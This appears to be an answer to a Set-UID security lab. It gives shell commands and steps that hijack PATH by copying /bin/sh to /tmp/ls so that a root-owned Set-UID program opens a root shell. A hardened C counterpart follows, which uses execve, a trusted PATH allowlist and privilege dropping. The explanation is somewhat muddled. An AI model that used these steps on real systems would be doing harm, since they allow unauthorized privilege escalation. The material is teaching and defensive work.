Answer:
Explanation:
Yes, you can make a Set-UID program that is owned by root run your code instead of /bin/ls, but this has its own drawbacks and is actually not safe. You cannot rely on it, since some shells drop the euid if it differs from the ruid, which is actually not safe either.
execl("/bin/ls", "ls", (char *)0);
Run this under your main program. Since it can have root privilege:
-$ cd /tmp/
/tmp$ sudo su
:/tmp# gcc -o system system.c
:/tmp# chmod u+s system    // changing file permissions (set the Set-UID bit)
:/tmp# exit
exit
:/tmp$ cp /bin/sh /tmp/ls
:/tmp$ ./system
Steps:
1. The first thing you need to do is copy /bin/sh to /tmp.
2. After copying /bin/sh to /tmp, give it the new name ls, but make sure your /bin/sh points to zsh.
3. Set PATH to the current directory, /tmp.
4. Compile.
5. Run the program system and you can get your root privilege.
Now, with the above example, if you change /bin/sh so that it points back to /bin/bash and repeat all the previous steps, you will not be able to get your root privileges.
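The following C program is an added example, not code from the answer above or from the lab it describes. It shows the defensive side of the same scenario: a Set-UID program that runs ls without going through a shell or the caller's PATH, so a copy of /bin/sh placed in /tmp under the name ls is never found. The trusted PATH value, the directory allowlist and the decision to drop root before the exec are this example's own assumptions.

```c
/* Hardened counterpart of the Set-UID "ls" program from the answer.
 * Instead of system("ls"), which starts /bin/sh and lets the shell search
 * the caller's PATH, the child execve()s an absolute path with a fixed
 * environment and drops the root privilege gained from the Set-UID bit. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumed trusted environment handed to the child: no caller PATH, no IFS. */
static const char *TRUSTED_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Assumed allowlist of directories a PATH may contain to count as trusted. */
static const char *TRUSTED_DIRS[] = { "/usr/bin", "/bin", "/usr/sbin", "/sbin", NULL };

/* 1 if the command needs no PATH search at all (absolute path), else 0. */
int is_absolute_path(const char *path) {
    return path != NULL && path[0] == '/';
}

/* 1 if every colon-separated entry of a PATH value is in TRUSTED_DIRS.
 * "", ".", "/tmp:..." and anything relative all return 0, so the PATH an
 * attacker sets in the answer's steps is rejected. */
int path_is_trusted(const char *path_value) {
    if (path_value == NULL) return 0;
    const char *p = path_value;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        int ok = 0;
        for (int i = 0; TRUSTED_DIRS[i] != NULL; i++) {
            if (strlen(TRUSTED_DIRS[i]) == len &&
                strncmp(TRUSTED_DIRS[i], p, len) == 0) {
                ok = 1;
                break;
            }
        }
        if (!ok) return 0;          /* empty, relative or unlisted entry */
        if (colon == NULL) return 1;
        p = colon + 1;
    }
}

/* Permanently give up the root euid/egid obtained from the Set-UID bit so
 * the child runs as the real user. Returns 0 on success, -1 on failure. */
int drop_privileges(void) {
    gid_t rgid = getgid();
    uid_t ruid = getuid();
    if (setgid(rgid) != 0) return -1;   /* group first, while still root */
    if (setuid(ruid) != 0) return -1;
    /* Confirm the effective ids really changed before trusting the drop. */
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* Run /bin/ls in a child with the trusted environment and no shell.
 * Returns the child's exit status, or -1 if fork, privilege drop or exec
 * failed (127 is the conventional "command not run" status). */
int run_ls_safely(void) {
    const char *prog = "/bin/ls";
    if (!is_absolute_path(prog)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privileges() != 0) _exit(127);
        char *const argv[] = { "ls", NULL };
        execve(prog, argv, (char *const *)TRUSTED_ENV);
        _exit(127);                     /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed PATH value of the kind the answer's step 3 sets up. */
    const char *hijacked = "/tmp:/usr/bin:/bin";
    printf("ruid=%d euid=%d\n", (int)getuid(), (int)geteuid());
    printf("PATH \"%s\" trusted: %s\n", hijacked,
           path_is_trusted(hijacked) ? "yes" : "no");
    const char *cur = getenv("PATH");
    printf("current PATH trusted: %s\n",
           path_is_trusted(cur) ? "yes" : "no (ignored anyway)");
    int rc = run_ls_safely();
    printf("ls exited with status %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Build and install it the same way as the answer's system program (gcc, then chown root and chmod u+s); with PATH set to /tmp and /tmp/ls in place, the child still executes /bin/ls, because nothing here ever consults PATH to locate the binary.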